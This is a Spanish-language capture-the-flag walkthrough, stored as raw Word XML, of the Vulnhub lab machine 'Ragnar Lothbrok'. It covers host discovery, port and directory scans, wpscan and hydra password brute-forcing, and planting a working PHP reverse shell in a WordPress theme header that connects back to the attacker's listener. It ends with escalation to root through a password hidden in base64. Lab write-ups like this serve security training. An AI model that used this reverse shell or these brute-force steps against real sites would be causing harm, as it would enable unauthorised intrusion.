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2239685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RAGNAR LOTHBROK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508056640625" w:line="278.14985275268555" w:lineRule="auto"/>
        <w:ind w:left="17.4432373046875" w:right="24.2041015625" w:firstLine="1.987152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Descargamos la máquina de Vulnhub. Doble click en el .ova. En configuración de red, adaptador puente,  nombre de adaptador y permitir todo.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427978515625" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="19.6511840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4d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4dbb"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">LOCALIZAMOS LA MÁQUINA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919921875" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="48.7968444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┌──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(root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kali)-[/home/kali/Desktop/RagnarLothbrok]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126953125" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="48.7968444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└─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 sudo arp-scan --interface eth0 -l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0009765625" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="19.6511840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192.168.0.22 PCS Systemtechnik GmbH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7.5262451171875" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="13.2479858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4d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4dbb"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CONECTIVIDAD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3199462890625" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="48.7968444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┌──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(root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kali)-[/home/kali/Desktop/RagnarLothbrok]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526123046875" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="48.7968444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└─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 ping -c1 192.168.0.22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0009765625" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="19.43038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PING 192.168.0.22 (192.168.0.22) 56(84) bytes of data.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12.3648071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64 bytes from 192.168.0.22: icmp_seq=1 ttl=64 time=8.65 ms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8.39035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--- 192.168.0.22 ping statistics ---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0" w:lineRule="auto"/>
        <w:ind w:left="19.6511840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packets transmitted, 1 received, 0% packet loss, time 0ms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17.44323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rtt min/avg/max/mdev = 8.646/8.646/8.646/0.000 ms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.9269409179688" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="16.11831665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IP DE LA MÁQUINA VICTIMA 192.168.0.22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40380859375" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="16.11831665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IP DE LA MAQUINA ATACANTE 192.168.0.10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7.5265502929688" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="11.9232177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4d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4dbb"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ESCANEAMOS PUERTOS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2401428222656" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="48.7968444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┌──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(root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kali)-[/home/kali/Desktop/RagnarLothbrok]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.7968444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└─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 nmap -p- -sVCS -Pn --min-rate 5000 192.168.0.22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.32666015625" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="10.377655029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21/tcp open ftp?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925537109375" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="7.507171630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80/tcp open http Apache httpd 2.4.46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927978515625" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="4.857635498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443/tcp open ssl/http Apache httpd 2.4.46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.926025390625" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="10.15670776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3306/tcp open mysql?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9261474609375" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="4.636840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Visitamos el servidor web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3262939453125" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0.40328979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276850" cy="1733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4893798828125" w:line="278.1496524810791" w:lineRule="auto"/>
        <w:ind w:left="10.59844970703125" w:right="366.22314453125" w:hanging="4.6368408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Xampp es un servidor web local multiplataforma que permite la creación y prueba de páginas web u  otros elementos de programación.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4.2288208007812" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="19.43038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 la descipción de la máquina nos indica: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9266052246094" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="19.43038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Pls, add /etc/hosts -&gt; ip vm + armbjorn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6511840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127.0.0.1 localhost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19.6511840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127.0.1.1 kali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20.975952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::1 localhost ip6-localhost ip6-loopback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0" w:lineRule="auto"/>
        <w:ind w:left="4.85763549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ff02::1 ip6-allnodes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4.85763549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ff02::2 ip6-allrouters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79296875" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="19.6511840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192.168.0.22 armbjorn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125" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="5.9616088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4d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4dbb"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ENUMERAMOS DIRECTORIOS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320556640625" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="48.7968444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┌──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(root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kali)-[/home/kali/Desktop/RagnarLothbrok]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125732421875" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="48.7968444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└─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 gobuster dir -u http://192.168.0.22 -w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26171875" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0.883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/usr/share/seclists/Discovery/Web-Content/raft-large-words.txt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460.6849193572998" w:lineRule="auto"/>
        <w:ind w:left="10.59844970703125" w:right="2464.2596435546875" w:firstLine="0.441589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=============================================================== Gobuster v3.6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95703125" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="17.44323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 OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@firefart)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52587890625" w:line="460.6849193572998" w:lineRule="auto"/>
        <w:ind w:left="21.41754150390625" w:right="2464.2596435546875" w:hanging="10.3775024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=============================================================== [+] Url: http://192.168.0.22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95703125" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="21.4175415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[+] Method: GET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21.4175415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[+] Threads: 10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460.68583488464355" w:lineRule="auto"/>
        <w:ind w:left="21.41754150390625" w:right="733.12927246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[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt [+] Negative Status codes: 404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956787109375" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="21.4175415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[+] User Agent: gobuster/3.6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40380859375" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="21.4175415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[+] Timeout: 10s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462.8584671020508" w:lineRule="auto"/>
        <w:ind w:left="8.61114501953125" w:right="2460.938720703125" w:firstLine="2.42889404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=============================================================== Starting gobuster in directory enumeration mode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16845703125" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="11.0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===============================================================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883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/.html (Status: 403) [Size: 1021]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0.883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/.htm (Status: 403) [Size: 1021]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460.68620681762695" w:lineRule="auto"/>
        <w:ind w:left="0.8831787109375" w:right="1694.12780761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/img (Status: 301) [Size: 232] [--&gt; http://192.168.0.22/img/] /webalizer (Status: 301) [Size: 238] [--&gt; http://192.168.0.22/webalizer/] /. (Status: 302) [Size: 0] [--&gt; http://192.168.0.22/dashboard/] /phpmyadmin (Status: 403) [Size: 1190]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94482421875" w:line="461.2288570404053" w:lineRule="auto"/>
        <w:ind w:left="0.8831787109375" w:right="1538.12805175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/wordpress (Status: 301) [Size: 238] [--&gt; http://192.168.0.22/wordpress/] /.htaccess (Status: 403) [Size: 1021]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59765625" w:line="460.6856346130371" w:lineRule="auto"/>
        <w:ind w:left="0.8831787109375" w:right="1514.12780761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/dashboard (Status: 301) [Size: 238] [--&gt; http://192.168.0.22/dashboard/] /secret (Status: 200) [Size: 40578]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295654296875" w:line="528.0492210388184" w:lineRule="auto"/>
        <w:ind w:left="48.796844482421875" w:right="1366.1981201171875" w:hanging="29.366455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 el directorio /secret tenemos una lista de palabras que guardamos en el archivo secret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┌──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(root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kali)-[/home/kali/Desktop/RagnarLothbrok]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207275390625" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="48.7968444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└─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 ls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5390625" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="19.43038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RagnarLothbrok.txt secret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.3260498046875" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="2.428741455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Tenemos un wordpress con lo que con wpscan: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26123046875" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="48.7968444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┌──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(root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kali)-[/home/kali/Desktop/RagnarLothbrok]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264404296875" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="48.7968444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└─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 wpscan --url http://192.168.0.22/wordpress -U ragnar -P secret --enumerate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3268432617188" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="21.4175415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[!] Valid Combinations Found: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40380859375" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="153.6769104003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Username: ragnar, Password: ubbe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3289794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276850" cy="24669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04931640625" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="19.43038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Buscamos subdirectorios en /wordpress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255126953125" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="48.7968444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┌──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(root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kali)-[/home/kali/Desktop/RagnarLothbrok]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1263427734375" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="48.7968444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└─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 dirb http://192.168.0.22/wordpress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.725830078125" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="10.5984497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GENERATED WORDS: 4612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9261474609375" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="8.39035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 Scanning URL: http://192.168.0.22/wordpress/ ----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8.39035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http://192.168.0.22/wordpress/index.php (CODE:301|SIZE:0)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11.0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==&gt; DIRECTORY: http://192.168.0.22/wordpress/wp-admin/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40380859375" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="11.0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==&gt; DIRECTORY: http://192.168.0.22/wordpress/wp-content/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40380859375" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="11.0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==&gt; DIRECTORY: http://192.168.0.22/wordpress/wp-includes/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2698974609375" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="8.39035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http://192.168.0.22/wordpress/xmlrpc.php (CODE:405|SIZE:42)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.32666015625" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="4.636840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Visitamos /wp-admin y con nuestras credenciales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328979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276850" cy="2257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1141357421875" w:line="528.0492210388184" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="1237.252197265625" w:firstLine="4.6368408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continuación, intentamos establecer una reverse shell, con lo que me pongo a la escucha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──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(root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kali)-[/home/kali/Desktop/RagnarLothbrok]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720947265625" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="48.7968444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└─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 nc -nlvp 8888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259033203125" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="17.44323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listening on [any] 8888 ...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78.51160049438477" w:lineRule="auto"/>
        <w:ind w:left="17.222442626953125" w:right="48.966064453125" w:hanging="12.58560180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Voy al panel de administración en Appareance/theme editor/theme header y coloco el siguiente codigo  .php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09619140625" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0.40328979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276850" cy="2895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035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&lt;?php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0.883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$ip = '192.168.0.10';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0.883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$port = 8888;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0" w:lineRule="auto"/>
        <w:ind w:left="0.883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$sock = fsockopen($ip, $port);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0.883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$descriptorspec = array(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79296875" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0.883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0 =&gt; $sock ,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0" w:lineRule="auto"/>
        <w:ind w:left="0.883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1 =&gt; $sock ,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2607421875" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0.883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2 =&gt; $sock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79296875" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0.883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);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0.883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$proc = proc_open('/bin/sh -i', $descriptorspec, $pipes);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0" w:lineRule="auto"/>
        <w:ind w:left="15.2351379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?&gt;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79.59790229797363" w:lineRule="auto"/>
        <w:ind w:left="10.59844970703125" w:right="157.1240234375" w:firstLine="8.83193969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código PHP se utiliza para establecer una conexión de shell inversa desde la máquina  comprometida a la máquina Kali Linux utilizando sockets TCP. Una vez que se establece la conexión, se  ejecuta un shell interactivo en la máquina Kali Linux y se redirigen los flujos estándar entre el shell  interactivo y la conexión de socket.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896484375" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="19.43038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Mejoramos la shell y listamos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9261474609375" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="11.26083374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$ python3 -c 'import pty; pty.spawn("/bin/sh")'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0" w:lineRule="auto"/>
        <w:ind w:left="11.26083374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$ bash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40380859375" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="17.44323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bash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266845703125" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="11.26083374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daemon@osboxes:/opt/lampp/htdocs/wordpress$ ls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17.44323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460.6612300872803" w:lineRule="auto"/>
        <w:ind w:left="6.623992919921875" w:right="1865.4730224609375" w:firstLine="8.611145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index.php wp-blog-header.php wp-cron.php wp-mail.php license.txt wp-comments-post.php wp-includes wp-settings.php readme.html wp-config.php wp-links-opml.php wp-signup.php wp-activate.php wp-config-sample.php wp-load.php wp-trackback.php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0.68620681762695" w:lineRule="auto"/>
        <w:ind w:left="11.260833740234375" w:right="2152.7789306640625" w:hanging="4.6368408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wp-admin wp-content wp-login.php xmlrpc.php daemon@osboxes:/opt/lampp/htdocs/wordpress$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3.294677734375" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="11.7024230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4d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4dbb"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ELEVAMOS PRIVILEGIOS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19921875" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="19.43038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esto, necesitamos investigar el servicio FTP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2734375" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="48.7968444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┌──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(root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kali)-[/home/kali/Desktop/RagnarLothbrok]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26318359375" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="48.7968444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└─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 ftp anonymous@192.168.0.22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5390625" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="11.26083374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Connected to 192.168.0.22.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13.24798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220 ProFTPD Server (ProFTPD) [::ffff:192.168.0.22]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11.923217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331 Password required for anonymous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19.43038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Password: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11.7024230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530 Login incorrect.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52587890625" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="4.85763549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ftp: Login failed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4.85763549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ftp&gt;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.3260498046875" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="11.26083374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 la herramienta hydra intentamos obtener password para "ragnar"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255126953125" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="48.7968444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┌──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(root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kali)-[/home/kali/Desktop/RagnarLothbrok]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264404296875" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="48.7968444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└─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 hydra -l ragnar -P secret -t 20 ftp://192.168.0.22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1265869140625" w:line="280.32297134399414" w:lineRule="auto"/>
        <w:ind w:left="10.59844970703125" w:right="0" w:firstLine="8.83193969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Hydra v9.5 (c) 2023 by van Hauser/THC &amp; David Maciejak - Please do not use in military or secret service  organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).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29541015625" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="19.43038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Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-04-21 17:09:18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40380859375" w:line="280.3226852416992" w:lineRule="auto"/>
        <w:ind w:left="9.715118408203125" w:right="141.98486328125" w:firstLine="11.70242309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[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous  session found, to prevent overwriting, ./hydra.restore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29541015625" w:line="460.61279296875" w:lineRule="auto"/>
        <w:ind w:left="21.41754150390625" w:right="571.12243652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[DATA] max 20 tasks per 1 server, overall 20 tasks, 4617 login tries (l:1/p:4617), ~231 tries per task [DATA] attacking ftp://192.168.0.22:21/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4175415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[21][ftp] host: 192.168.0.22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login: ragnar password: lagertha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925537109375" w:line="460.68620681762695" w:lineRule="auto"/>
        <w:ind w:left="9.715118408203125" w:right="3900.166015625" w:firstLine="1.5457153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daemon@osboxes:/opt/lampp/htdocs/wordpress$ su ragnar su ragnar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96923828125" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="19.43038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Password: lagertha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.52490234375" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="17.44323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ragnar@osboxes:/opt/lampp/htdocs/wordpress$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9273681640625" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="17.44323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ragnar@osboxes:~$ ls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0" w:lineRule="auto"/>
        <w:ind w:left="17.44323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ls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19.43038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Desktop Downloads Pictures secret Videos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0" w:lineRule="auto"/>
        <w:ind w:left="19.43038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Documents Music Public Templates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9.1259765625" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="17.44323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ragnar@osboxes:~$ cat secret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10.5984497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cat secret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10.81924438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are you ok? bashrc is bad guy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9.326171875" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="10.5984497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cat: write error: Broken pipe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9264526367188" w:line="460.68554878234863" w:lineRule="auto"/>
        <w:ind w:left="15.89752197265625" w:right="2476.846923828125" w:firstLine="3.53286743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 parte "bashrc es malo" podría sugerir que hay un problema con el archivo  ".bashrc", que es un script que inicializa el entorno de la shell Bash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43038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Leemos el fichero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9267578125" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="17.44323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ragnar@osboxes:~$ cat .bashrc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0" w:lineRule="auto"/>
        <w:ind w:left="10.5984497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cat .bashrc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4.85763549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 ~/.bashrc: executed by bash(1) for non-login shells.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79296875" w:line="460.68506240844727" w:lineRule="auto"/>
        <w:ind w:left="4.857635498046875" w:right="2550.0970458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 see /usr/share/doc/bash/examples/startup-files (in the package bash-doc) # for examples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49755859375" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="4.85763549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 If not running interactively, don't do anything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10.5984497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case $- in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0" w:lineRule="auto"/>
        <w:ind w:left="0.883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*i*) ;;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0.883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*) return;;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0" w:lineRule="auto"/>
        <w:ind w:left="10.81924438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esac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9.1259765625" w:line="460.68514823913574" w:lineRule="auto"/>
        <w:ind w:left="4.857635498046875" w:right="2999.92248535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 enable programmable completion features (you don't need to enable #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this, if it's already enabled in /etc/bash.bashrc and /etc/profile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 sources /etc/bash.bashrc).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95751953125" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="4.636840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Vamos a ese subdirectorio y al final del archivo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.5264282226562" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="17.44323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ragnar@osboxes:/etc$ cat bash.bashrc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10.5984497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cat bash.bashrc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8466491699219" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="3.97430419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#aHR0cHM6Ly9lcy53aWtpcGVkaWEub3JnL3dpa2kvS2V2aW5fTWl0bmljawo=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43038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Parece un archivo codificado en base 64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26123046875" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="48.7968444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┌──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(root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kali)-[/home/kali/Desktop/RagnarLothbrok]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126953125" w:line="923.5453605651855" w:lineRule="auto"/>
        <w:ind w:left="17.4432373046875" w:right="460.39306640625" w:firstLine="31.3536071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└─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 echo "aHR0cHM6Ly9lcy53aWtpcGVkaWEub3JnL3dpa2kvS2V2aW5fTWl0bmljawo=" | base64 -d https://es.wikipedia.org/wiki/Kevin_Mitnick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66259765625" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="19.43038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Intentamos hacernos root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9261474609375" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="17.44323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ragnar@osboxes:/etc$ su root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9.71511840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 root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19.43038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Password: kevinmitnick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.325927734375" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="17.44323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root@osboxes:~# ls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17.44323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ls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19.43038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Desktop hello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.3260498046875" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="17.44323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root@osboxes:~# cat hello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10.5984497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cat hello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40380859375" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="21.4175415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¡Congratulation! Have a nice day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9.3264770507812" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="19.43038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I'm very happy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21.3712692260742" w:lineRule="auto"/>
        <w:ind w:left="17.4432373046875" w:right="2839.842529296875" w:firstLine="1.987152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How the little piglets would grunt if they knew how the old boar suffered root@osboxes:~# </w:t>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:pgSz w:h="15840" w:w="12240" w:orient="portrait"/>
      <w:pgMar w:bottom="1529.2799377441406" w:top="1428.40087890625" w:left="1439.5967102050781" w:right="1437.68676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